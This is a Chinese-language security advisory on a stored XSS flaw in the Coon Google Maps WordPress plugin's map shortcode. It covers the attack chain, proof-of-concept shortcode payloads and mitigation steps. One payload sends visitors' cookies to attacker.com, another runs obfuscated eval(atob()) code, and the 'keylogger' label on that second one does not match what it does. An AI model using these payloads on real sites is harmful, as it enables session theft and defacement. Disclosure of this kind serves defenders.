CVE-2025-12662 WordPress Coon Google Maps插件Stored XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12662

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Coon Google Maps WordPress插件

漏洞概述

Coon Google Maps是WordPress平台上广泛使用的一款Google地图集成插件，允许用户通过简码（shortcode）在网页中嵌入交互式Google地图。该插件在1.0及以下所有版本中存在严重的存储型跨站脚本（Stored XSS）漏洞。漏洞根源在于插件对用户提供的属性参数缺乏充分的输入清理和输出转义处理，特别是通过map简码的'height'参数，攻击者可以注入任意JavaScript代码。由于该代码会被永久存储在数据库中，所有访问包含恶意代码页面的用户都会受到攻击影响。此漏洞需要认证才能利用，但攻击者只需拥有Contributor级别或更高的账户权限即可实施攻击，这在WordPress多用户博客场景中较为常见。

技术细节

漏洞存在于插件处理map简码属性时的输入验证环节。具体而言，当用户使用[map height="xxx"]简码时，插件直接将height参数值嵌入到HTML输出中而未进行适当的HTML实体转义或输入验证。攻击者可以通过构造包含JavaScript事件处理器或脚本标签的payload来突破上下文限制。例如，攻击者可以将height参数设置为类似100px onload=alert(document.cookie)的值，当其他用户访问包含此简码的页面时，浏览器会将其解析为有效的HTML属性并在页面加载时执行注入的脚本。由于WordPress的contributor角色具有创建和编辑文章（需审核后发布）的权限，攻击者可以在待审核的文章中注入恶意代码，即使文章最终未发布，攻击者仍可能在编辑器预览阶段达成攻击目的。

攻击链分析

STEP 1

1

侦察阶段：攻击者识别目标网站使用的WordPress版本和Coon Google Maps插件版本（≤1.0）

STEP 2

2

权限获取：攻击者获取WordPress Contributor级别账户（通过账户创建、凭证窃取或社工手段）

STEP 3

3

恶意代码注入：攻击者在文章编辑页面插入包含XSS payload的map简码，payload示例：[map height="100px onload=alert(document.cookie)"]

STEP 4

4

数据持久化：恶意简码被保存到WordPress数据库中，作为文章内容或元数据的一部分

STEP 5

5

触发执行：当管理员或其他用户访问包含恶意简码的页面时，浏览器解析HTML并执行注入的JavaScript代码

STEP 6

6

攻击完成：攻击者通过JavaScript获取受害者cookie、劫持会话、修改页面内容或进行进一步内网渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress Stored XSS via Coon Google Maps Plugin -->
<!-- Required: Contributor+ role -->

<!-- PoC 1: Basic alert payload -->
[map height="100px onerror=alert(document.domain)"]

<!-- PoC 2: Cookie stealing payload -->
[map height='100px onload=fetch("https://attacker.com/steal?c="+document.cookie)']

<!-- PoC 3: Session hijacking via keylogger -->
[map height="100px onfocus=eval(atob('YWxlcnQoJ1hTUyBpbmplY3RlZCcpOw=='))"]

<!-- PoC 4: DOM manipulation payload -->
[map height="100px onmouseover=document.body.innerHTML='<h1>Hacked</h1>'"]

<!-- Attack workflow:
1. Attacker with Contributor role creates/edits a post
2. Inserts malicious shortcode with XSS payload in height parameter
3. When page is viewed, JavaScript executes in victim's browser
4. Attacker can steal session cookies, redirect users, or modify page content
-->

影响范围

Coon Google Maps WordPress插件 <= 1.0

防御指南

临时缓解措施

立即限制Contributor及以上角色的文章发布权限，在插件更新前临时禁用Coon Google Maps插件或移除所有使用map简码的内容。同时建议网站管理员审查近期由Contributor用户创建或编辑的文章，检查是否存在恶意简码。对于无法立即更新的情况，可在functions.php中添加临时过滤器清理height参数中的危险字符。